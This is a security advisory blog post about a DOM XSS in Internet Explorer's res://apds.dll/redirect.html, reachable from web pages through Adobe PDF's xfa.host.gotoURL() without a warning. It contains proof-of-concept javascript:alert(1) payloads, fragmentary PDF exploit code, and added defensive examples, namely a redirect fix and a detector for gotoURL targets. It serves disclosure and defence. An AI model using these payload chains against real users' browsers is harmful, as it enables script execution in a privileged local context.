~# n0tr00t Security Team

From http:// domain to res:// domain xss by using IE Adobe’s PDF ActiveX plugin

10 Mar 2019 - superhei

[+] Author: superhei
[+] Team: n0tr00t security team
[+] From: https://www.n0tr00t.com
[+] Create: 2019-03-19

0x01 res://apds.dll/redirect.html dom xss

Project Zero issue https://bugs.chromium.org/p/project-zero/issues/detail?id=1598&desc=5 reported an XSS vulnerability in res://apds.dll/redirect.html, and it has still not been fixed.

This is a typical DOM XSS vulnerability, as the res://apds.dll/redirect.html code shows (the query-string value of target is extracted and used as the redirect destination without checking its scheme):

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" >
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <script type="text/javascript">
        var targetParamRegex = /[\?\&]target=([^\&\#]+)/i;
        var targetResults = targetParamRegex.exec(window.location.search);
        if (targetResults) {

POC: res://apds.dll/redirect.html?target=javascript:alert(1)
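As an added illustration, not code from the advisory or from Microsoft's redirect.html: the same target-extraction regex reduced to a pure function, beside a scheme-allowlisting check of the kind that would close this DOM XSS. The function names and the http/https allowlist are my assumptions, and the code runs in Node rather than in the browser page:

```javascript
// Added example, not code from the advisory or from Microsoft's redirect.html.
// The regex is the one quoted from res://apds.dll/redirect.html; the checking
// functions below are an assumed hardening, written to run in Node without a DOM.

// Same pattern as redirect.html: grab the raw "target" value from a query string.
const targetParamRegex = /[\?\&]target=([^\&\#]+)/i;

// Vulnerable half of the flow: returns whatever the query string says, unvalidated.
// redirect.html hands this value to the navigation, so "javascript:..." runs as script.
function extractTarget(search) {
  const m = targetParamRegex.exec(search);
  return m ? m[1] : null;
}

// Hardened half (assumed design): parse the value as an absolute URL and allow
// only http/https. javascript:, vbscript:, data:, res:, protocol-relative "//host"
// and malformed input all come back as null instead of being navigated to.
function safeRedirectTarget(raw) {
  if (typeof raw !== "string") return null;
  let parsed;
  try {
    parsed = new URL(decodeURIComponent(raw)); // throws on bad escapes or non-absolute URLs
  } catch (e) {
    return null;
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") return null;
  // The parser has already stripped embedded tabs/newlines, so a mangled scheme
  // such as "java%0Ascript:" is classified as javascript: and rejected above.
  return parsed.href;
}

// Drop-in replacement for the vulnerable flow: the URL to navigate to, or null to refuse.
function resolveRedirect(search) {
  return safeRedirectTarget(extractTarget(search));
}

// Stand-alone demo with the advisory's PoC query string.
console.log(extractTarget("?target=javascript:alert(1)"));     // javascript:alert(1) (raw, unvalidated)
console.log(resolveRedirect("?target=javascript:alert(1)"));   // null: refused
console.log(resolveRedirect("?target=https://example.com/a")); // https://example.com/a
```

The fix is an allowlist on the parsed scheme, not a blocklist of "javascript:" spellings: parsing first means case variants, percent-encoding and embedded control characters are normalised before the decision is made.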

0x02 from http:// domain to res:// domain

Normally, a page in the http:// domain is not allowed to access res:// resources. The JavaScript function xfa.host.gotoURL() in Adobe PDF can open URLs of several schemes, including http(s):// and file://. Of course, in general, a security prompt is shown when such a PDF file is opened.

But when the PDF is rendered by Adobe's PDF ActiveX plugin in IE and uses xfa.host.gotoURL() to access a res:// or http(s):// URL:

     xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//");

there is no security alert, and the XSS payload alert(1) is executed.
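As an added defensive example (not code from the advisory or from Adobe), a small scanner for the JavaScript inside a PDF's XFA stream that lists every xfa.host.gotoURL() destination and flags the ones that are not plain http(s) URLs, so a document that would navigate the viewer to res:// stands out before it is opened. The sample script, the function names and the http/https policy are my assumptions:

```javascript
// Added detection example, not code from the advisory or from Adobe. It scans the
// JavaScript embedded in a PDF's XFA stream for xfa.host.gotoURL() calls and flags
// destinations that are not plain http(s) URLs (res:, javascript:, file:, ...).

// Matches xfa.host.gotoURL("...") or ('...') and captures the quoted destination.
const gotoUrlRegex = /xfa\.host\.gotoURL\s*\(\s*(["'])(.*?)\1\s*\)/gi;

function findGotoUrlTargets(scriptText) {
  const targets = [];
  let m;
  gotoUrlRegex.lastIndex = 0; // the regex is global and shared, so restart each scan
  while ((m = gotoUrlRegex.exec(scriptText)) !== null) {
    targets.push(m[2]);
  }
  return targets;
}

// Scheme of a URL as the viewer would see it (leading whitespace tolerated, case-folded).
function schemeOf(url) {
  const m = /^\s*([a-z][a-z0-9+.\-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null; // null: relative or scheme-less
}

// Policy (assumed): only http and https count as ordinary; everything else,
// including res:, javascript:, file: and scheme-less values, is reported.
function classifyTarget(url) {
  const scheme = schemeOf(url);
  const suspicious = scheme !== "http" && scheme !== "https";
  return { url, scheme, suspicious };
}

function scanXfaScript(scriptText) {
  return findGotoUrlTargets(scriptText).map(classifyTarget);
}

function suspiciousTargets(scriptText) {
  return scanXfaScript(scriptText).filter((r) => r.suspicious).map((r) => r.url);
}

// Constructed sample: two gotoURL calls as they might appear in an XFA script block
// (the second is the call quoted in the advisory).
const SAMPLE_XFA_SCRIPT = [
  'xfa.host.gotoURL("https://www.n0tr00t.com/");',
  'xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//");',
].join("\n");

// Stand-alone demo: prints only the res:// destination from the sample.
console.log(suspiciousTargets(SAMPLE_XFA_SCRIPT));
```

In practice the XFA stream has to be inflated and pulled out of the PDF first; this scanner takes the decoded script text and is the rule you would hang on the end of that extraction, or turn into a YARA string match.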



r.pdf code:

1 0 obj

2 0 obj <<>>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">

    <subform name="a">

  /Pages <<>>
      /XFA 2 0 R

0x03 fixed?

Due to IE's security domain isolation, the harm of a res:// domain XSS is limited. But I think Microsoft should actively fix the res://apds.dll/redirect.html XSS vulnerability, and Adobe should disable URL redirects or give a corresponding security warning. The world can be more beautiful and harmonious!

0x04 Timeline